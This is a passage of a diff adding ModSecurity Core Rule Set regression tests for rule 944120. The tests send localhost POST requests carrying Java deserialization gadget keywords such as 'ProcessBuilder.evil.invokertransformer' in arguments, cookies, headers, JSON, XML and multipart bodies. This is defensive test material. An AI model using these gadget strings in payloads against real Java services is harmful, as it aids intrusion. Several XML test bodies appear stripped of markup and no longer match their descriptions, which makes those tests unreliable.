\"944120\"" + - test_title: 944120-27 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-28 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-29 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-30 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-31 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-32 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-33 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-34 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-35 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-36 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-37 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-38 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-39 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-40 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-41 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-42 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-43 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-44 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-45 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-46 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-47 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-48 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-49 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-50 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: id "944120" + - test_title: 944120-51 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-52 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-53 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-54 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-55 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-56 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-57 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-58 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-59 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-60 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-61 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-62 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-63 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-64 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-65 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-66 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-67 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-68 + desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 